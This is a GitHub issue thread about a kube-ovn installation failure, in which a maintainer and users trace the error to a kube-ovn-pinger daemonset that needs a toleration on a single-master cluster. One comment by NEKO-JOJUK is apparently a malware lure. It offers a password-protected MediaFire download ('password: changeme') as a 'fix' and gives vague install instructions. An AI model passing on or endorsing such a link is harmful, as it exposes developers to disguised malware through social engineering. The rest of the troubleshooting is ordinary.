### ISSUE TITLE
[BUG] 报错

### ISSUE THREAD

**Issue by niezhicheng** [kubeovn/kube-ovn#4446]
### Kube-OVN Version

1.12.21

### Kubernetes Version

v1.28.0

### Operation-system/Kernel Version

[Step 4/6] Delete pod that not in host network mode
pod "coredns-66f779496c-28cft" deleted
pod "coredns-66f779496c-gkmjm" deleted
Waiting for deployment "coredns" rollout to finish: 0 of 2 updated replicas are available...
Waiting for deployment "coredns" rollout to finish: 1 of 2 updated replicas are available...
deployment "coredns" successfully rolled out
daemon set "kube-ovn-pinger" successfully rolled out
error: no matching resources found

### Description

报错

### Steps To Reproduce

报错

### Current Behavior

Current Behavior

### Expected Behavior

Current Behavior

**Comment by bobz965** [comment]
bash -x install.sh  看下是哪个命令触发的错误哦

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by acechef** [comment]
第四步执行kubectl wait pod --for=condition=Ready -l app=kube-ovn-pinger -n kube-system --timeout 120s的时候
![image](https://github.com/user-attachments/assets/e51e40c2-4329-4e5e-964b-77f06bb1649b)

**Comment by acechef** [comment]
@bobz965 建出来了，我在install.sh的kube-ovn-pinger daemonset处加了容忍就可以了
![image](https://github.com/user-attachments/assets/176f2605-6672-45e9-8945-a7633459908d)

**Comment by acechef** [comment]
我用的是单master的k8s环境

**Comment by bobz965** [comment]
> @bobz965 建出来了，我在install.sh的kube-ovn-pinger daemonset处加了容忍就可以了 ![image](https://private-user-images.githubusercontent.com/13142913/393069205-176f2605-6672-45e9-8945-a7633459908d.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzM0NTI5NDgsIm5iZiI6MTczMzQ1MjY0OCwicGF0aCI6Ii8xMzE0MjkxMy8zOTMwNjkyMDUtMTc2ZjI2MDUtNjY3Mi00NWU5LTg5NDUtYTc2MzM0NTk5MDhkLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDEyMDYlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQxMjA2VDAyMzcyOFomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTNhOWEzNDU3ZjA1ZGMzMzdkNjNjODQ3ZmI2ZGNkZDMwNGZjZTQ3OWQyYTliNzJmNDM5ZjJlYjQ3ZTQ4NGVkNmImWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0In0.APMq1IylOaA1_IDghvROBddTN0_vZVs0ywWPnD8nAqY)

好的 感谢
